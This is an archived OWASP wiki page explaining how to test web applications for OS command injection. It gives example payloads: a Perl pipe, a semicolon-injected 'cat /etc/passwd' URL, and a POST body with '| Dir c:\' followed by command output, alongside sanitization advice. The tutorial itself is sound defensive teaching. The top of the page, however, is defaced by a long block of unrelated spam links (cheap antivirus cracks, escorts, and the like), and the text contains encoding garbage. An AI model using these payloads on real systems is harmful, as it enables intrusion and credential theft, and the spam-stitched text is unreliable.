This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Testing for Command Injection (OTG-INPVAL-013)
[http://s1.shard.jp/losaul/exchange-rate-australian.html mothers day australia 2005 ] [http://s1.shard.jp/galeach/new100.html tsunami diaster in asia ] [http://s1.shard.jp/frhorton/obe78uzn9.html teen mission trips to africa ] [http://s1.shard.jp/losaul/alloys-australian.html machinery sales australia ] [http://s1.shard.jp/galeach/new134.html asian school girls in thongs ] [http://s1.shard.jp/olharder/capital-one-auto.html delphi automotive systems private limited ] [http://s1.shard.jp/frhorton/ybfhg5c59.html african giant snail ] [http://s1.shard.jp/olharder/autodesk-inventor.html autometrics.net ] [http://s1.shard.jp/losaul/australian-cricket.html australian customs office ] http [http://s1.shard.jp/galeach/new87.html rice company an asian bistro ] [http://s1.shard.jp/bireba/download-free.html mccafee antivirus free download ] [http://s1.shard.jp/losaul/when-is-fathers.html hickinbotham homes south australia ] [http://s1.shard.jp/galeach/new165.html asian girl friends ] [http://s1.shard.jp/frhorton/1kjwm4ocq.html ancient african kingdom ] index [http://s1.shard.jp/olharder/bournes-auto.html used automobiles in winston salem north carolina ] links [http://s1.shard.jp/losaul/2nd-hand-books.html australia termite ] domain [http://s1.shard.jp/galeach/map.html asian woman knife stabbing belly navel ] [http://s1.shard.jp/bireba/antivirus-check.html panda antivirus platinum 7.05.03 crack ] [http://s1.shard.jp/frhorton/bq5czt3ax.html africana hotel kampala ] [http://s1.shard.jp/bireba/avg-vs-avast.html pc cillin 2000 antivirus ] [http://s1.shard.jp/galeach/new21.html asian elephants information ] [http://s1.shard.jp/frhorton/sofu2962u.html africa skin animal ] [http://s1.shard.jp/bireba/avg-antivirus-linux.html macafee antivirus free download ] [http://s1.shard.jp/losaul/06-australia.html down under dive cairns australia ] [http://s1.shard.jp/frhorton/k7b9qt4bf.html muslim in africa ] [http://s1.shard.jp/olharder/sunnyside-auto.html autooglasi srbija ] [http://s1.shard.jp/olharder/automotive-suspension.html surface mount technology semi automatic an ] [http://s1.shard.jp/galeach/new66.html asian heart mumbai ] [http://s1.shard.jp/olharder/auto-emissions-test.html automobile bad credit loan online ] page [http://s1.shard.jp/olharder/automatic-dc-queue.html auto cad piping software ] [http://s1.shard.jp/frhorton/1tzcpt1xe.html african american on the supreme court ] [http://s1.shard.jp/olharder/audi-automotive.html autoverhuur amsterdam ] [http://s1.shard.jp/bireba/avg-free-download.html norton antivirus website ] [http://s1.shard.jp/galeach/new142.html asian photographers ] [http://s1.shard.jp/frhorton/gcc5hqqy1.html south africa police force ] [http://s1.shard.jp/losaul/emmigrating-australia.html import goods to australia ] [http://s1.shard.jp/bireba/avast-free-antivirus.html cheap antivirus software ] [http://s1.shard.jp/olharder/auto-tune-demo.html best buy auto lincoln nebraska ] [http://s1.shard.jp/frhorton/9df15nbui.html customary law in south africa ] [http://s1.shard.jp/galeach/new138.html asian childrens games ] 2006 african american hair prom style [http://s1.shard.jp/olharder/ontegra-automotive.html champion auto group long island ] [http://s1.shard.jp/frhorton/q5ck3w5jf.html old/new cotton jute bags in south africa ] [http://s1.shard.jp/losaul/beds-online-australia.html one way car rentals australia ] [http://s1.shard.jp/losaul/australian-oil.html drop bear australia ] [http://s1.shard.jp/bireba/linux-antivirus.html trojan antivirus free download ] [http://s1.shard.jp/bireba/antivirus-mcafee.html crack for panda titanium antivirus 2005 ] [http://s1.shard.jp/frhorton/fg84cc18u.html history of african drums ] [http://s1.shard.jp/frhorton/7fqgy22i2.html durban south africa pictures ] [http://s1.shard.jp/losaul/weight-loss-medication.html digital camera online australia ] [http://s1.shard.jp/bireba/antivirus-tests.html pop pro up winantivirus ] [http://s1.shard.jp/olharder/autopsy-picture.html maxson automatic machinery ] [http://s1.shard.jp/olharder/seiko-titanium-kinetic.html autoway lincoln ] [http://s1.shard.jp/galeach/new42.html colocasia gigantea ] [http://s1.shard.jp/frhorton/tyyykyebz.html dancing skeleton life and death in west africa ] [http://s1.shard.jp/galeach/new71.html asian mpx220 rom ] [http://s1.shard.jp/bireba/antivirus-software.html norton antivirus corporate edition uninstall ] avg 6.0 antivirus serial number [http://s1.shard.jp/galeach/new172.html walt disney fantasia 2000 ] [http://s1.shard.jp/bireba/symantic-antivirus.html quickheal antivirus download ] [http://s1.shard.jp/frhorton/hzioyx6wv.html african mask coloring pages ] [http://s1.shard.jp/olharder/morrey-auto-group.html auto brake problems ] [http://s1.shard.jp/bireba/avg-antivirus-7.html 2006 winantivirus ] [http://s1.shard.jp/frhorton/c1k98s3rt.html african art west ] [http://s1.shard.jp/frhorton/yzxhrnmp9.html african diaspora mathematician ] [http://s1.shard.jp/galeach/new46.html asian lion habitat ] [http://s1.shard.jp/bireba/panda-antivirus.html ratings of antivirus software ] [http://s1.shard.jp/olharder/the-autobiography.html auto auctions new jersey ] [http://s1.shard.jp/olharder/kurt-cobain-autograph.html a to z auto shipping ] [http://s1.shard.jp/frhorton/rm22odke6.html africa fair fashion in south trade ] [http://s1.shard.jp/olharder/sunnyside-auto.html automotive financial consultant ] [http://s1.shard.jp/bireba/antivirus-comparison.html kaspersky antivirus cracks ] [http://s1.shard.jp/bireba/guard-antivirus.html download symantec antivirus 9.0.3 ] [http://s1.shard.jp/galeach/new56.html kasia bujakiewicz ckm ] [http://s1.shard.jp/bireba/manually-updating.html top rated antivirus programs ] [http://s1.shard.jp/olharder/auto-calculator.html auto turret ] [http://s1.shard.jp/frhorton/cluquehu7.html south african national anthem audio ] [http://s1.shard.jp/losaul/visa-para-australia.html motorcycle accesories australia ] [http://s1.shard.jp/galeach/new93.html www business times asia1 com ] [http://s1.shard.jp/losaul/australia-desert.html australian flight centre ] [http://s1.shard.jp/losaul/australian-sports.html australian restaurant london ] [http://s1.shard.jp/frhorton/dkumgq8of.html map of europe an northern africa ] domain [http://s1.shard.jp/frhorton/9df15nbui.html south africa sports channel ] [http://s1.shard.jp/frhorton/bnm8i4pvp.html africas best universities ] [http://s1.shard.jp/galeach/new106.html asian escorts new york ] [http://s1.shard.jp/frhorton/tqdtzy3e9.html africa de informacion ] [http://s1.shard.jp/galeach/new101.html asian4you.com passwords ] [http://s1.shard.jp/frhorton/qogtjly72.html picture of famous black african american ] [http://s1.shard.jp/olharder/antique-autos-for.html autoindex org ] [http://s1.shard.jp/galeach/new31.html a political map of south east asia ] [http://s1.shard.jp/losaul/australia-importing.html australia coast gold shark ] [http://s1.shard.jp/frhorton/4jl7mv47m.html challenges facing african universities ] [http://s1.shard.jp/galeach/new94.html bl asian ] [http://s1.shard.jp/olharder/automobile-essai.html autodromo bellezas ] http://www.textc4tzelmo.com OWASP Testing Guide v3 Table of Contents
This article is part of the OWASP Testing Guide v3. The entire OWASP Testing Guide v3 can be downloaded here.
OWASP at the moment is working at the OWASP Testing Guide v4: you can browse the Guide here
Brief Summary
This article describes how to test an application for OS command injection. We try try to inject an OS command through an HTTP request to the application.
Short Description of the Issue
OS command injection is a technique used via a web interface in order to execute OS commands on a web server.
The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
Black Box testing and example
When viewing a file in a web application, the file name is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol âÃÂÃÂ|âÃÂàonto the end of the filename.
Example URL before alteration:
http://sensitive/cgi-bin/userData.pl?doc=user1.txt
Example URL modified:
http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|
This will execute the command âÃÂÃÂ/bin/lsâÃÂÃÂ.
Appending a semicolon to the end of a URL for a .PHP page followed by an operating system command, will execute the command.
Example:
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
Example
Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up WebScarab, you can obtain a POST HTTP like the following:
POST http://www.example.com/public/doc HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://127.0.0.1/WebGoat/attack?Screen=20 Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5 Authorization: Basic T2Vbc1Q9Z3V2Tc3e= Content-Type: application/x-www-form-urlencoded Content-length: 33 Doc=Doc1.pdf
In this post request, we notice how the application retrieves the public documentation. Now we can test if it is possible to add an operating system command to inject in the POST HTTP. Try the following:
POST http://www.example.com/public/doc HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://127.0.0.1/WebGoat/attack?Screen=20 Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5 Authorization: Basic T2Vbc1Q9Z3V2Tc3e= Content-Type: application/x-www-form-urlencoded Content-length: 33 Doc=Doc1.pdf+|+Dir c:\
If the application doesn't validate the request, we can obtain the following result:
Exec Results for 'cmd.exe /c type "C:\httpd\public\doc\"Doc=Doc1.pdf+|+Dir c:\' Output... Il volume nell'unitÃÂÃÂ C non ha etichetta. Numero di serie Del volume: 8E3F-4B61 Directory of c:\ 18/10/2006 00:27 2,675 Dir_Prog.txt 18/10/2006 00:28 3,887 Dir_ProgFile.txt 16/11/2006 10:43 Doc 11/11/2006 17:25 Documents and Settings 25/10/2006 03:11 I386 14/11/2006 18:51 h4ck3r 30/09/2005 21:40 25,934 OWASP1.JPG 03/11/2006 18:29 Prog 18/11/2006 11:20 Program Files 16/11/2006 21:12 Software 24/10/2006 18:25 Setup 24/10/2006 23:37 Technologies 18/11/2006 11:14 3 File 32,496 byte 13 Directory 6,921,269,248 byte disponibili Return code: 0
In this case, we have successfully performed an OS injection attack.
Gray Box testing
Sanitization
The URL and form data needs to be sanitized for invalid characters. A âÃÂÃÂblacklistâÃÂàof characters is an option but it may be difficult to think of all of the characters to validate against. Also there may be some that were not discovered as of yet. A âÃÂÃÂwhite listâÃÂàcontaining only allowable characters should be created to validate the user input. Characters that were missed, as well as undiscovered threats, should be eliminated by this list.
Permissions
The web application and its components should be running under strict permissions that do not allow operating system command execution. Try to verify all these informations to test from a Gray Box point of view
References
White papers
Tools